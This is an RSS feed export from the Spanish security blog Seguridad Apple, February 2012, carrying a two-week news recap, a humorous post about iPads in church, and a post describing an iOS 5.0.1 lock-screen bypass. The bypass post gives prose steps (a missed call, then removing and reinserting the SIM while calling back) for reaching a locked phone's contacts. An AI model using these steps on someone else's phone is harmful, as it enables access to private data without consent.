<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" media="screen" href="/~d/styles/rss2full.xsl"?><?xml-stylesheet type="text/css" media="screen" href="http://feeds.feedburner.com/~d/styles/itemcontent.css"?><rss xmlns:atom="http://www.w3.org/2005/Atom" xmlns:openSearch="http://a9.com/-/spec/opensearch/1.1/" xmlns:georss="http://www.georss.org/georss" xmlns:gd="http://schemas.google.com/g/2005" xmlns:thr="http://purl.org/syndication/thread/1.0" xmlns:feedburner="http://rssnamespace.org/feedburner/ext/1.0" version="2.0"><channel><atom:id>tag:blogger.com,1999:blog-7727366960388490644</atom:id><lastBuildDate>Sun, 26 Feb 2012 17:42:10 +0000</lastBuildDate><category>Redes</category><category>wipping</category><category>entretenimiento</category><category>ePad</category><category>sms</category><category>fingerprinting</category><category>SQL Injection</category><category>malware</category><category>Bitcoin</category><category>DNI-e</category><category>Windows</category><category>Apple</category><category>Firma Digital</category><category>Curiosidades</category><category>Vulnerabilidades</category><category>VPN</category><category>contrabando</category><category>cracking</category><category>rdp</category><category>Mac Pro</category><category>FTP</category><category>keylogger</category><category>Oxygen Forensics</category><category>Mac OS X</category><category>Blakberry</category><category>App Store</category><category>Galaxy tab</category><category>Humor</category><category>autenticacion</category><category>robos</category><category>iOS</category><category>Acrobat Reader</category><category>rootkits</category><category>troyano</category><category>FileVault</category><category>PowerPC</category><category>IBM</category><category>facebook</category><category>botnets</category><category>Mac App Store</category><category>control parental</category><category>SSH</category><category>Apple II</category><category>CSS</category><category>PDF</category><category>mitm</category><category>Javascript</category><category>S/MIME</category><category>pharming</category><category>Metasploit</category><category>Apple I</category><category>Shockwave</category><category>USB</category><category>beta</category><category>greenpois0n</category><category>Seguridad Informática</category><category>data carving</category><category>hijacking</category><category>VoIP</category><category>iPhone</category><category>Actualizaciones</category><category>Firefox</category><category>iTunes</category><category>Rosetta</category><category>drivers</category><category>Certificados Digitales</category><category>Hacked</category><category>Cheetah</category><category>patentes</category><category>TrueCrypt</category><category>WhatsApp</category><category>Bluetooth</category><category>MacBook Air</category><category>Internet Explorer</category><category>AirPort Base</category><category>GPRS</category><category>Intel</category><category>Blog</category><category>iPhone 4S</category><category>iWork</category><category>Antirootkits</category><category>Next</category><category>0day</category><category>Microsoft</category><category>iPad 2</category><category>Firewire</category><category>Xcode</category><category>Exchange</category><category>Numbers</category><category>hacking</category><category>Simbian</category><category>Puma</category><category>Oracle</category><category>Ebay</category><category>BlackSEO</category><category>Leopard</category><category>Cydia</category><category>Cifrado</category><category>Windows Phone</category><category>Steve Jobs</category><category>SeguridadApple.com</category><category>QuickTime</category><category>Blackberry</category><category>Chrome</category><category>foca</category><category>Mac OS</category><category>OTP</category><category>spyware</category><category>clickjacking</category><category>estadisticas</category><category>SSL</category><category>Spam</category><category>apple tv</category><category>SandBox</category><category>aslr</category><category>iPod Touch</category><category>troyanos</category><category>Ingeniería inversa</category><category>Cloud Computing</category><category>Jaguar</category><category>Pages</category><category>e-Goverment</category><category>iCloud</category><category>SharePoint</category><category>Apple.com</category><category>SealSign</category><category>rogue AV</category><category>Google</category><category>Tiger</category><category>Open Source</category><category>iSight</category><category>OTC</category><category>phishing</category><category>scalpers</category><category>pentesting</category><category>paypal</category><category>hardening</category><category>PowerBook</category><category>Active Directory</category><category>Linux</category><category>twitter</category><category>Antimalware</category><category>Keynote</category><category>Samsung</category><category>DOS</category><category>DNS</category><category>ThunderBolt</category><category>Verisign</category><category>MacBook Pro</category><category>rendimiento</category><category>Mountain Lion</category><category>Recuperar Datos</category><category>Estafas</category><category>Flash</category><category>libros</category><category>Adobe Acrobat</category><category>Kodak</category><category>e-mail</category><category>Safari</category><category>Mac</category><category>DRM</category><category>firmware</category><category>lockpicking</category><category>prototipo</category><category>Antivirus</category><category>Blogs</category><category>fortificación</category><category>iPod nano</category><category>backup</category><category>Adobe</category><category>escritorio remoto</category><category>HTC</category><category>Lion</category><category>hasselhoff</category><category>Sony</category><category>delitos</category><category>Nokia</category><category>Apple Store</category><category>LDAP</category><category>Time-Capsule</category><category>MobileMe</category><category>Bill Gates</category><category>Ping</category><category>Juegos</category><category>QuickTake</category><category>Seguridad física</category><category>exploits</category><category>Monitorización</category><category>Bugs</category><category>Multiserver</category><category>Wifi</category><category>Bil Gates</category><category>antiforensics</category><category>HTML</category><category>GPS</category><category>Jailbreak</category><category>evilgrade</category><category>hacktivismo</category><category>cursos</category><category>Siri</category><category>XSS</category><category>widget</category><category>OpenSSH</category><category>ColdFusion</category><category>iBook</category><category>tuenti</category><category>bitdefender</category><category>MacBook</category><category>GSM</category><category>proxy</category><category>iPad2</category><category>iMessage</category><category>ingeniería social</category><category>Firewall</category><category>Steve Wozniak</category><category>lopd</category><category>3G</category><category>Historia</category><category>COCOA</category><category>Ma OS X</category><category>msn</category><category>General</category><category>CL-9</category><category>Noticias</category><category>Virus</category><category>PGP</category><category>parche</category><category>imac</category><category>SSHFS</category><category>hackingtosh</category><category>Android</category><category>denuncias</category><category>Yahoo</category><category>memory leak</category><category>Mac Mini</category><category>Macintosh</category><category>Microsoft Office</category><category>Herramientas</category><category>iPhone 5</category><category>iBooks</category><category>AirPort Utility</category><category>Java</category><category>Privacidad</category><category>Snow Leopard</category><category>metadatos</category><category>ENS</category><category>IPod</category><category>Análisis forense</category><category>Macintosh II</category><category>unlock</category><category>eventos</category><category>Panther</category><category>iPad</category><category>Juice Jacking</category><category>Objetive-C</category><title>Seguridad Apple</title><description>Seguridad Apple es un blog creado con el espíritu de investigar e informar de cualquier noticia que tenga que ver con el mundo de la seguridad informática {bugs, exploits, malaware, actualizaciones, pentesting, forense, fortificación, auditoria, legal, hacking, etcétera} y las tecnologías Apple</description><link>http://www.seguridadapple.com/</link><managingEditor>noreply@blogger.com (SeguridadApple)</managingEditor><generator>Blogger</generator><openSearch:totalResults>780</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>25</openSearch:itemsPerPage><atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="self" type="application/rss+xml" href="http://feeds.feedburner.com/Seguridadapple" /><feedburner:info uri="seguridadapple" /><atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="hub" href="http://pubsubhubbub.appspot.com/" /><feedburner:emailServiceId>Seguridadapple</feedburner:emailServiceId><feedburner:feedburnerHostname>http://feedburner.google.com</feedburner:feedburnerHostname><item><guid isPermaLink="false">tag:blogger.com,1999:blog-7727366960388490644.post-8527731194500731794</guid><pubDate>Sun, 26 Feb 2012 06:02:00 +0000</pubDate><atom:updated>2012-02-26T07:02:00.570+01:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">SeguridadApple.com</category><title>Fue noticia en Seguridad Apple: del 13 al 26 de Febrero</title><description>&lt;div style="text-align: justify;"&gt;&lt;a href="http://4.bp.blogspot.com/-21QUF1y6z5M/T0kt2oMJ6bI/AAAAAAAADGg/6SctQVWwhes/s1600/fuenoticia.jpg" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"&gt;&lt;img border="0" src="http://4.bp.blogspot.com/-21QUF1y6z5M/T0kt2oMJ6bI/AAAAAAAADGg/6SctQVWwhes/s1600/fuenoticia.jpg" /&gt;&lt;/a&gt;Hoy domingo toca el post de repaso en el que recordamos todos los artículos publicados durante las últimas dos semanas en &lt;a href="http://www.seguridadapple.com/"&gt;Seguridad Apple&lt;/a&gt;, así que vamos a comenzar.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;El lunes 13 de Febrero comenzamos con la noticia de que &lt;i&gt;&lt;b&gt;FlashBack&lt;/b&gt;&lt;/i&gt;, el malware que comenzó a desplegarse con trucos de ingeniería social en sistemas Mac OS X, ha evolucionado en las últimas variantes para &lt;a href="http://www.seguridadapple.com/2012/02/flashback-trojan-infecta-mac-os-x-sin.html"&gt;utilizar exploits de Java e infectar sistemas no parcheados&lt;/a&gt;.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;El martes, con la noticia de que &lt;i&gt;&lt;b&gt;Kodak&lt;/b&gt;&lt;/i&gt; había cerrado, echamos una mirada a la historia de Apple para recordar los modelos de cámaras digitales de &lt;a href="http://www.seguridadapple.com/2012/02/apple-quicktake-camara-digital-de-apple.html"&gt;Apple QuickTake&lt;/a&gt;, cuyos modelos 100 y 150 fueron construidos por &lt;i&gt;&lt;b&gt;Kodak&lt;/b&gt;&lt;/i&gt;.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;El miércoles 15 tuvimos la noticia del &lt;a href="http://www.seguridadapple.com/2012/02/path-enviaba-los-contactos-sin.html"&gt;escándalo con la aplicación Path&lt;/a&gt;, que sin informar a los usuarios accedía a la agenda de contactos y la transmitía a sus servidores, lo que obligó a la compañía a pedir disculpas y actualizar la aplicación. Ese mismo día también nos hicimos eco de la aparición de un nuevo &lt;a href="http://www.seguridadapple.com/2012/02/actualizacion-critica-de-adobe.html"&gt;expediente de seguridad desde Adobe&lt;/a&gt; para parchear un conjunto de bugs críticos que estaban siendo utilizados ya en Internet.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;El jueves de esa semana os dejamos un &lt;a href="http://www.seguridadapple.com/2012/02/melasudo-robar-la-password-un-sudoer.html"&gt;script, llamado MelaSudo&lt;/a&gt; creado en el &lt;i&gt;&lt;b&gt;SOCtano&lt;/b&gt;&lt;/i&gt; de &lt;a href="http://www.informatica64.com/"&gt;Informática 64&lt;/a&gt; para conseguir robar la password de un usuario &lt;i&gt;&lt;b&gt;sudoer&lt;/b&gt;&lt;/i&gt; mediante un truco de ingeniería social generando un alias del comando &lt;i&gt;&lt;b&gt;sudo&lt;/b&gt;&lt;/i&gt;.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;a href="http://4.bp.blogspot.com/-F_TuW0Hl_BM/T0kuPjtOa4I/AAAAAAAADGw/wZhkCg34QTU/s1600/gatekeeper-120216-2.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="163" src="http://4.bp.blogspot.com/-F_TuW0Hl_BM/T0kuPjtOa4I/AAAAAAAADGw/wZhkCg34QTU/s200/gatekeeper-120216-2.png" width="200" /&gt;&lt;/a&gt;El viernes tocó hablar de &lt;i&gt;&lt;b&gt;Mac OS X 10.8 Mountain Lion&lt;/b&gt;&lt;/i&gt;, anunciado para este verano y del que se han revelado algunas novedades de seguridad, como &lt;a href="http://www.seguridadapple.com/2012/02/os-x-108-mountain-lion-viene-con-un.html"&gt;Gatekeeper&lt;/a&gt;, una solución que intenta bloquear el malware dándole al usuario la capacidad de bloquear cualquier aplicación que no haya sido descargada desde la &lt;i&gt;&lt;b&gt;App Store&lt;/b&gt;&lt;/i&gt;, o que no venga firmada por ningún desarrollador de Apple.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;En la sección de curiosidades que nos reservamos para los viernes tarde publicamos una curiosa foto en la que se puede ver que &lt;a href="http://www.seguridadapple.com/2012/02/steve-jobs-esta-haciendo-cambios-en-el.html"&gt;los iPad se han metido en la vida religiosa&lt;/a&gt;, dejando claro hasta donde llegó la visión de &lt;i&gt;&lt;b&gt;Steve Jobs&lt;/b&gt;&lt;/i&gt;.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Para el sábado, otra noticia con un escándalo de privacidad, en este caso la propia &lt;i&gt;&lt;b&gt;Google&lt;/b&gt;&lt;/i&gt; que según desveló el &lt;i&gt;&lt;b&gt;Wall Street Journal&lt;/b&gt;&lt;/i&gt;, estaba utilizando un &lt;a href="http://www.seguridadapple.com/2012/02/google-vigilaba-la-navegacion-de-los.html"&gt;código especial para saltarse las opciones de privacidad de los navegadores Apple Safari&lt;/a&gt;.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;El domingo le tocó el turno a la aplicación &lt;i&gt;&lt;b&gt;Twitter para iOS&lt;/b&gt;&lt;/i&gt;, que con la función &lt;i&gt;&lt;b&gt;Encontrar amigos&lt;/b&gt;&lt;/i&gt; estaba &lt;a href="http://www.seguridadapple.com/2012/02/twitter-para-ios-envuelto-en-el.html"&gt;enviando los contactos de la agenda de contactos en iOS a los servidores&lt;/a&gt; de la compañía de los 140 caracteres, durante 18 meses, sin avisar en ningún momento al usuario de la aplicación.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;a href="http://3.bp.blogspot.com/-xT_IWpZ9RvI/T0kuK6M8XWI/AAAAAAAADGo/fw8ueJxOS4c/s1600/safari-165.png" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"&gt;&lt;img border="0" src="http://3.bp.blogspot.com/-xT_IWpZ9RvI/T0kuK6M8XWI/AAAAAAAADGo/fw8ueJxOS4c/s1600/safari-165.png" /&gt;&lt;/a&gt;El lunes 20 comenzamos a mirar las opciones de privacidad, forenses y antiforenses de &lt;i&gt;&lt;b&gt;Apple Safari&lt;/b&gt;&lt;/i&gt;, y comenzamos con &lt;a href="http://www.seguridadapple.com/2012/02/privacidad-en-apple-safari-el-historial.html"&gt;el Historial de Navegación&lt;/a&gt;. Así analizamos dónde se almacena, como se puede borrar y cómo funciona la &lt;i&gt;&lt;b&gt;Navegación Privada&lt;/b&gt;&lt;/i&gt;.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Para el martes 21 publicamos la segunda entrega sobre la privacidad en &lt;i&gt;&lt;b&gt;Apple Safari&lt;/b&gt;&lt;/i&gt;, en este caso &lt;a href="http://www.seguridadapple.com/2012/02/privacidad-en-apple-safari-las.html"&gt;analizamos las descargas&lt;/a&gt;, que pueden ayudar a recomponer el historial de navegación incluso si se ha borrado el historial o activado la navegación privada.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;El miércoles continúo el &lt;a href="http://www.seguridadapple.com/2012/02/el-caso-del-espionaje-de-google.html"&gt;caso del espionaje de Google&lt;/a&gt; a los usuarios. &lt;i&gt;&lt;b&gt;Microsoft&lt;/b&gt;&lt;/i&gt; confirmó que los usuarios de &lt;i&gt;&lt;b&gt;Internet Explorer&lt;/b&gt;&lt;/i&gt; también habían sido espiados, &lt;i&gt;&lt;b&gt;Google&lt;/b&gt;&lt;/i&gt; comenzó a recibir las demandas de los usuarios y os hablamos de &lt;i&gt;&lt;b&gt;Do Not Track Plus&lt;/b&gt;&lt;/i&gt;, un plug-in para mejorar las opciones de privacidad en los navegadores.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;El jueves echamos un vistazo a una opción de &lt;i&gt;&lt;b&gt;IDA&lt;/b&gt;&lt;/i&gt; que permite realizar procesos de &lt;a href="http://www.seguridadapple.com/2012/02/analizar-binarios-de-mac-os-x-desde.html"&gt;ingeniería inversa de binarios de Mac OS X remotamente&lt;/a&gt; desde sistemas operativos &lt;i&gt;&lt;b&gt;Windows&lt;/b&gt;&lt;/i&gt;.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;a href="http://2.bp.blogspot.com/-d3NjNpvAfD0/T0kvIJoLSiI/AAAAAAAADG4/y4UgnPUuxrA/s1600/Iglesia_Ipad2.jpeg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="132" src="http://2.bp.blogspot.com/-d3NjNpvAfD0/T0kvIJoLSiI/AAAAAAAADG4/y4UgnPUuxrA/s200/Iglesia_Ipad2.jpeg" width="200" /&gt;&lt;/a&gt;Para el viernes pasado publicamos la tercera entrega dedicada a la privacidad de &lt;i&gt;&lt;b&gt;Apple Safari&lt;/b&gt;&lt;/i&gt;, en este caso &lt;a href="http://www.seguridadapple.com/2012/02/privacidad-en-apple-safari-la-cache-y.html"&gt;la caché y las cookies&lt;/a&gt;, que permiten reconstruir el historial de navegación de un usuario.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;En la sección de curiosidad de la tarde del viernes, la segunda parte de la &lt;a href="http://www.seguridadapple.com/2012/02/se-confirma-steve-jobs-impone-el-ipad.html"&gt;modernización de la Iglesia &lt;/a&gt;empujada desde el cielo. Y es que las fotos son curiosas.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Por último, ayer sábado la noticia fue para un nuevo &lt;a href="http://www.seguridadapple.com/2012/02/nuevo-bug-en-iphone-ios-501-permite.html"&gt;bug de iOS 5.0.1&lt;/a&gt; que, gracias a un fallo con el sistema de ahorro de energía, con una llamada perdida, metiendo y sacando la &lt;i&gt;&lt;b&gt;SIM&lt;/b&gt;&lt;/i&gt; del terminal, es posible saltar la restricción del código de bloqueo.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Y esto ha sido todo lo que hemos publicado durante estas dos semanas, que esperamos que te haya permitido seguir la actualidad de lo acaecido relativo a seguridad en las tecnologías &lt;i&gt;&lt;b&gt;Apple&lt;/b&gt;&lt;/i&gt;.&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;br/&gt;Descubre en este libro cómo funciona el mundo del &lt;a href="http://www.informatica64.com/libros.aspx?id=fonline"&gt;Fraude Online&lt;/a&gt;&lt;br/&gt;&lt;br/&gt;
Publicado en &lt;a href="http://www.seguridadapple.com" target="new"&gt;Seguridad Apple&lt;/a&gt; - 
Suscríbete al &lt;a href="http://feeds.feedburner.com/Seguridadapple"&gt;canal RSS &lt;/a&gt; - Sigue &lt;a href="https://plus.google.com/111010890582588306653/posts"&gt;Seguridad Apple en Google+&lt;/a&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7727366960388490644-8527731194500731794?l=www.seguridadapple.com' alt='' /&gt;&lt;/div&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/Seguridadapple?a=JC8UBgZfzuw:vdmM7a8pRCA:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/Seguridadapple?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/Seguridadapple?a=JC8UBgZfzuw:vdmM7a8pRCA:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/Seguridadapple?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/Seguridadapple?a=JC8UBgZfzuw:vdmM7a8pRCA:ecdYMiMMAMM"&gt;&lt;img src="http://feeds.feedburner.com/~ff/Seguridadapple?d=ecdYMiMMAMM" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/Seguridadapple?a=JC8UBgZfzuw:vdmM7a8pRCA:I9og5sOYxJI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/Seguridadapple?d=I9og5sOYxJI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/Seguridadapple?a=JC8UBgZfzuw:vdmM7a8pRCA:-BTjWOF_DHI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/Seguridadapple?i=JC8UBgZfzuw:vdmM7a8pRCA:-BTjWOF_DHI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/Seguridadapple?a=JC8UBgZfzuw:vdmM7a8pRCA:F7zBnMyn0Lo"&gt;&lt;img src="http://feeds.feedburner.com/~ff/Seguridadapple?i=JC8UBgZfzuw:vdmM7a8pRCA:F7zBnMyn0Lo" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;</description><link>http://feedproxy.google.com/~r/Seguridadapple/~3/JC8UBgZfzuw/fue-noticia-en-seguridad-apple-del-13.html</link><author>noreply@blogger.com (SeguridadApple)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://4.bp.blogspot.com/-21QUF1y6z5M/T0kt2oMJ6bI/AAAAAAAADGg/6SctQVWwhes/s72-c/fuenoticia.jpg" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://www.seguridadapple.com/2012/02/fue-noticia-en-seguridad-apple-del-13.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-7727366960388490644.post-1713017441501497888</guid><pubDate>Sat, 25 Feb 2012 07:47:00 +0000</pubDate><atom:updated>2012-02-25T08:47:09.122+01:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">iPhone</category><category domain="http://www.blogger.com/atom/ns#">Privacidad</category><category domain="http://www.blogger.com/atom/ns#">iOS</category><category domain="http://www.blogger.com/atom/ns#">Bugs</category><title>Nuevo Bug en iPhone iOS 5.0.1 permite saltarse el bloqueo</title><description>&lt;div style="text-align: justify;"&gt;Hace poco os informamos del &lt;a href="http://www.seguridadapple.com/2012/02/un-bug-en-ios-501-permite-hacer.html"&gt;bug en iOS 5.0.1 que permite hacer llamadas FaceTime&lt;/a&gt; e inspeccionar el contenido de la agenda de contados en terminales bloqueados. Hoy toca hablar de un curioso &lt;i&gt;&lt;b&gt;fallo que se produce al quitar y poner la tarjeta SIM de un terminal que ha recibido una llamada perdida a la que se quiere devolver la llamada&lt;/b&gt;&lt;/i&gt;, que permite acceder a todos los contactos y realizar llamadas desde un teléfono bloqueado.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;El proceso, aunque parece un poco tedioso por los intentos que hay que realizar, permite a un atacante tener acceso a todos los contactos en menos de tres minutos, y sus pasos son bastante sencillos, tal y como se puede ver en el siguiente vídeo.&lt;/div&gt;&lt;center&gt;&lt;br /&gt;
&lt;iframe allowfullscreen="" frameborder="0" height="315" src="http://www.youtube.com/embed/Vhy9_bYVIwk" width="560"&gt;&lt;/iframe&gt;&lt;br /&gt;
&lt;/center&gt;&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;Primero hay que hacer una llamada perdida al terminal que se desea desbloquear. Después hay que sacar la &lt;b&gt;&lt;i&gt;SIM&lt;/i&gt;&lt;/b&gt; y re-introducirla al mismo tiempo que se selecciona la opción de devolver la llamada perdida. Esto, de alguna manera, aprovecha un fallo en la gestión del ahorro de batería que salta cuando se quita la tarjeta &lt;i&gt;&lt;b&gt;SIM&lt;/b&gt;&lt;/i&gt;, y confunde al terminal permitiendo tener acceso a la lista de los contactos.&amp;nbsp;Un nuevo bug a solucionar para la - ya esperada y necesaria - versión &lt;i&gt;&lt;b&gt;iOS 5.1&lt;/b&gt;&lt;/i&gt;.&amp;nbsp;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;br/&gt;Descubre en este libro cómo funciona el mundo del &lt;a href="http://www.informatica64.com/libros.aspx?id=fonline"&gt;Fraude Online&lt;/a&gt;&lt;br/&gt;&lt;br/&gt;
Publicado en &lt;a href="http://www.seguridadapple.com" target="new"&gt;Seguridad Apple&lt;/a&gt; - 
Suscríbete al &lt;a href="http://feeds.feedburner.com/Seguridadapple"&gt;canal RSS &lt;/a&gt; - Sigue &lt;a href="https://plus.google.com/111010890582588306653/posts"&gt;Seguridad Apple en Google+&lt;/a&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7727366960388490644-1713017441501497888?l=www.seguridadapple.com' alt='' /&gt;&lt;/div&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/Seguridadapple?a=BrtyhB6PsDg:oxcs6YnN9s8:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/Seguridadapple?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/Seguridadapple?a=BrtyhB6PsDg:oxcs6YnN9s8:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/Seguridadapple?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/Seguridadapple?a=BrtyhB6PsDg:oxcs6YnN9s8:ecdYMiMMAMM"&gt;&lt;img src="http://feeds.feedburner.com/~ff/Seguridadapple?d=ecdYMiMMAMM" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/Seguridadapple?a=BrtyhB6PsDg:oxcs6YnN9s8:I9og5sOYxJI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/Seguridadapple?d=I9og5sOYxJI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/Seguridadapple?a=BrtyhB6PsDg:oxcs6YnN9s8:-BTjWOF_DHI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/Seguridadapple?i=BrtyhB6PsDg:oxcs6YnN9s8:-BTjWOF_DHI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/Seguridadapple?a=BrtyhB6PsDg:oxcs6YnN9s8:F7zBnMyn0Lo"&gt;&lt;img src="http://feeds.feedburner.com/~ff/Seguridadapple?i=BrtyhB6PsDg:oxcs6YnN9s8:F7zBnMyn0Lo" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;</description><link>http://feedproxy.google.com/~r/Seguridadapple/~3/BrtyhB6PsDg/nuevo-bug-en-iphone-ios-501-permite.html</link><author>noreply@blogger.com (SeguridadApple)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://img.youtube.com/vi/Vhy9_bYVIwk/default.jpg" height="72" width="72" /><thr:total>1</thr:total><feedburner:origLink>http://www.seguridadapple.com/2012/02/nuevo-bug-en-iphone-ios-501-permite.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-7727366960388490644.post-7930332905955590051</guid><pubDate>Fri, 24 Feb 2012 11:30:00 +0000</pubDate><atom:updated>2012-02-24T12:30:02.098+01:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Curiosidades</category><category domain="http://www.blogger.com/atom/ns#">iPad</category><category domain="http://www.blogger.com/atom/ns#">Steve Jobs</category><category domain="http://www.blogger.com/atom/ns#">iPad 2</category><category domain="http://www.blogger.com/atom/ns#">Humor</category><title>Se confirma: Steve Jobs impone el iPad en el cielo</title><description>&lt;div style="text-align: justify;"&gt;Si el viernes pasado recordábamos a &lt;i&gt;&lt;b&gt;Steve Jobs&lt;/b&gt;&lt;/i&gt; por el impacto que tuvo en todo el mundo, sorprendidos de que este cambio llegara hasta &lt;a href="http://www.seguridadapple.com/2012/02/steve-jobs-esta-haciendo-cambios-en-el.html"&gt;la propia forma de comunicarse con Dios&lt;/a&gt;, hoy traemos otra foto en la que se confirma que este cambio de comunicación con lo divino es un hecho.&lt;/div&gt;&lt;br /&gt;
&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-kyYNzpzcrHQ/T0am9GUlPlI/AAAAAAAADGI/YQt8p-FFDkA/s1600/Iglesia_Ipad2.jpeg" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" src="http://2.bp.blogspot.com/-kyYNzpzcrHQ/T0am9GUlPlI/AAAAAAAADGI/YQt8p-FFDkA/s1600/Iglesia_Ipad2.jpeg" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;&lt;i&gt;Visto en &lt;a href="http://www.segnorasque.com/2012/02/nuevas-pruebas-de-la-modernizacion-de.html"&gt;Señoras Que&lt;/a&gt;&lt;/i&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;Y es que desde que &lt;i&gt;&lt;b&gt;Steve Jobs&lt;/b&gt;&lt;/i&gt; llegó al cielo, debió llevar contigo todo su genio y sus ideas para revolucionar el entorno al juntarse con otros grandes genios.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
